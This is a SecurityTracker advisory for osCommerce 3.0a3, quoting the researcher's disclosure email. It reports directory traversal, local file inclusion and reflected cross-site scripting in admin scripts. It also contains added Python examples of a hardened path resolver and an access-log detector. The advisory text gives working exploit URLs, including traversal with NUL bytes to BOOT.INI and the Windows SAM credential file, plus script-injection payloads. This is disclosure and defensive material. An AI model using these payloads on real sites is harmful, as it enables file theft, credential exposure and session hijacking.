osCommerce 'admin/templates_boxes_layout.php' Directory Traversal Bug Discloses Files to Remote Users
SecurityTracker Alert ID: 1017353
SecurityTracker URL: http://securitytracker.com/id?1017353
CVE Reference: CVE-2006-6533, CVE-2006-6534
Updated: May 22 2008
Original Entry Date: Dec 7 2006
Impact: Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Exploit Included: Yes
Version(s): 3.0a3
Description: Lostmon reported a vulnerability in osCommerce. A remote user can view files on the target system. A remote user can also conduct cross-site scripting attacks.
The 'admin/templates_boxes_layout.php' script does not properly validate user-supplied input in the 'filter' parameter. A remote user can
supply a specially crafted request to view files on the target system.
Some demonstration exploit URLs are provided:
http://[target]/admin/templates_boxes_layout.php?set=boxes&filter=../../our_evil_php_file&lID=27
http://[target]/admin/templates_boxes_layout.php?set=boxes&filter=../../../../file.extension%00
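The 'filter' handling described above, modelled in Python as an added example (this is not osCommerce's own code, which is PHP): the unsafe path construction the advisory reports, including the NUL-byte truncation that PHP versions before 5.3.4 applied to filesystem paths, beside a hardened resolver that accepts only an allowlisted template name and a canonical-path check for code that must accept a path. The directory name comes from the advisory's error message; the allowlist contents and all function names are assumptions.

```python
import os
import re

# Relative template directory, as it appears in the advisory's error message.
TEMPLATE_DIR = "includes/templates"
# Assumed allowlist of template names the page is meant to load.
ALLOWED_TEMPLATES = {"boxes", "content"}


def build_include_path_unsafe(filter_value: str) -> str:
    """Model of the vulnerable behaviour: the raw 'filter' value is pasted into
    the path and '.php' is appended. PHP before 5.3.4 handed the string to the
    C library, so a %00 byte cut it off and the appended suffix was lost."""
    path = f"{TEMPLATE_DIR}/{filter_value}.php"
    return path.split("\0", 1)[0]  # emulate C-string truncation at NUL


def resolve_filter_safe(filter_value: str) -> str:
    """Hardened version: only a plain, allowlisted name is accepted, so '../',
    NUL bytes and extensions are rejected before any path is built."""
    if not re.fullmatch(r"[A-Za-z0-9_]+", filter_value):
        raise ValueError("filter must be a simple template name")
    if filter_value not in ALLOWED_TEMPLATES:
        raise ValueError("unknown template")
    return f"{TEMPLATE_DIR}/{filter_value}.php"


def filter_is_accepted(filter_value: str) -> bool:
    """True when the hardened resolver accepts the value."""
    try:
        resolve_filter_safe(filter_value)
        return True
    except ValueError:
        return False


def is_within_base(base_dir: str, relative_path: str) -> bool:
    """Defence in depth where a path must be accepted: canonicalise base and
    candidate and require the candidate to remain inside the base."""
    base_real = os.path.realpath(base_dir)
    cand_real = os.path.realpath(os.path.join(base_dir, relative_path))
    return os.path.commonpath([base_real, cand_real]) == base_real


if __name__ == "__main__":
    for value in ("boxes", "../../../../file.extension\0"):
        print(repr(value), "->", build_include_path_unsafe(value),
              "| hardened accepts:", filter_is_accepted(value))
```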
A remote user can also create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code
to be executed by the target user's browser. The code will originate from the site running the osCommerce software and will run
in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication
cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take
actions on the site acting as the target user.
Some demonstration exploit URLs are provided:
http://[target]/oscommerce/admin/modules.php?set=shipping%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://[target]/definitiva/admin/customers.php?selected_box=customers%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://[target]/oscommerce/admin/languages_definitions.php?lID=1%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://[target]/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product
The original advisory is available at:
http://lostmon.blogspot.com/2006/12/oscommerce-traversal-arbitrary-file.html
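For detection, an added example (not part of the advisory) that scans web-server access logs for the request patterns listed above: traversal sequences and NUL bytes in the 'filter' parameter of the traversal bug, and attribute break-out plus script tags in the reflected admin parameters of the cross-site scripting bug. The log lines and client addresses are constructed for the example; query values are decoded a second time so that double URL-encoded payloads are also caught.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache-style access log lines modelled on the advisory's URL patterns.
SAMPLE_LOG = """\
203.0.113.5 - - [07/Dec/2006:10:31:42 +0100] "GET /oscommerce/admin/templates_boxes_layout.php?set=boxes&filter=boxes&lID=27 HTTP/1.1" 200 4123
203.0.113.9 - - [07/Dec/2006:10:32:01 +0100] "GET /oscommerce/admin/templates_boxes_layout.php?set=boxes&filter=../../../../file.extension%00&lID=27 HTTP/1.1" 200 812
203.0.113.9 - - [07/Dec/2006:10:33:17 +0100] "GET /oscommerce/admin/modules.php?set=shipping%22%3E%3Cscript%3Ealert('xss')%3C/script%3E HTTP/1.1" 200 2210
203.0.113.9 - - [07/Dec/2006:10:34:02 +0100] "GET /oscommerce/admin/products.php?pID=1%2522%253E%253CSCRIPT%253Ealert(1)%253C/SCRIPT%253E&action=new_product HTTP/1.1" 200 2198
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<url>\S+) [^"]*" (?P<status>\d{3})'
)
ATTR_BREAKOUT_RE = re.compile(r"""["'][^<>]*>\s*<""")  # closes an attribute, opens a tag
SCRIPT_TAG_RE = re.compile(r"<\s*script\b", re.IGNORECASE)


def classify_request(url: str) -> list[str]:
    """Findings for one request URL. Values are decoded a second time so that
    double-encoded payloads (%2522 -> %22 -> ") are inspected in clear."""
    findings = []
    for name, values in parse_qs(urlsplit(url).query, keep_blank_values=True).items():
        for value in values:          # parse_qs has already decoded once
            decoded = unquote(value)  # second pass for double encoding
            if "\0" in decoded:
                findings.append(f"{name}: NUL byte")
            if "../" in decoded or "..\\" in decoded:
                findings.append(f"{name}: path traversal")
            if ATTR_BREAKOUT_RE.search(decoded) or SCRIPT_TAG_RE.search(decoded):
                findings.append(f"{name}: HTML/script injection")
    return findings


def scan_log(text: str) -> list[tuple[str, str, list[str]]]:
    """(client ip, url, findings) for every request that triggers a finding."""
    hits = []
    for line in text.splitlines():
        match = LOG_RE.match(line)
        if match is None:
            continue
        findings = classify_request(match["url"])
        if findings:
            hits.append((match["ip"], match["url"], findings))
    return hits


if __name__ == "__main__":
    for ip, url, findings in scan_log(SAMPLE_LOG):
        print(ip, url, ", ".join(findings))
```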

Impact: A remote user can view files on the target system.
A remote user can access the target user's cookies (including authentication
cookies), if any, associated with the site running the osCommerce software, access data recently submitted by the target user via
web form to the site, or take actions on the site acting as the target user.

Solution: No solution was available at the time of this entry.

Vendor URL: www.oscommerce.com/

Cause: Input validation error

Underlying OS: Linux (Any), UNIX (Any), Windows (Any)

Reported By: Lostmon <lostmon@gmail.com>

Message History:
None.

Source Message Contents

Date: Thu, 7 Dec 2006 10:31:42 +0100
From: Lostmon <lostmon@gmail.com>
Subject: Oscommerce 3.0a3 traversal arbitrary file access

############################################
Oscommerce traversal arbitrary file access
Vendor: http://www.oscommerce.com/about/news,125
Advisory: http://lostmon.blogspot.com/2006/12/oscommerce-traversal-arbitrary-file.html
Vendor notify: NO    Exploit available: YES
###########################################
osCommerce contains a flaw that allows remote traversal and
arbitrary file access. This flaw exists because the application
does not validate the filter variable upon submission to the
admin/templates_boxes_layout.php script. This could allow a
remote authenticated administrator to create a specially
crafted URL that would execute '../' directory traversal
characters to view files on the target system with
the privileges of the target web service.
####################
versions
####################
Oscommerce 3.0a3
###################
SOLUTION
###################
No solution was available at this time.
################
timeline
################
Discovered: 11-11-2006
vendor notify: -----
vendor response: ----
disclosure: 07-12-2006
#################
Examples
#################
######################
traversal file access
######################
When we try to open
http://localhost/oscommerce/admin/templates_boxes_layout.php?set=boxes&filter=[SOME WORD]&lID=27
the application returns a full path disclosure and
returns this error:
Warning: require(includes/templates/[SOME WORD].php) [function.require]: failed to open stream: No such file or directory in C:\AppServ\www\oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13
Fatal error: require() [function.require]: Failed opening required 'includes/templates/[SOME WORD].php' (include_path='.;C:\php5\pear') in C:\AppServ\www\oscommerce\admin\templates\pages\templates_boxes_layout.php on line 13
The application adds the .php extension to our [SOME WORD], ummm,
and it searches for the file in a folder inside the webserver.
We can include any PHP file located on the web server
in the application and it is executed (local file inclusion):
http://[victim]/admin/templates_boxes_layout.php?set=boxes&filter=../../our_evil_php_file&lID=27
If we try to read a file outside the webserver folder with a non-PHP
extension, we can try this to test...
&filter=../../../../file.extension%00 to look, for example, for boot.ini
on a Windows system:
http://localhost/oscommerce/admin/templates_boxes_layout.php?set=boxes&filter=../../../../BOOT.INI%00&lID=27
http://localhost/oscommerce/admin/templates_boxes_layout.php?set=content&filter=../../../../windows/repair/sam%00&lID=27
#####################
Cross site scripting
#####################
http://localhost/oscommerce/admin/modules.php?set=shipping%22%3E%3Cscript%3Ealert('xss')%3C/script%3E
http://localhost/definitiva/admin/customers.php?selected_box=customers%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/languages_definitions.php?lID=1%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E
http://localhost/oscommerce/admin/products.php?pID=1%22%3E%3CSCRIPT%3Ealert(String.fromCharCode(88,83,83))%3C/SCRIPT%3E&action=new_product
######################## €nd #####################
Thanks to Estrella for being my light.
--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
--
Curiosity is what makes the mind move....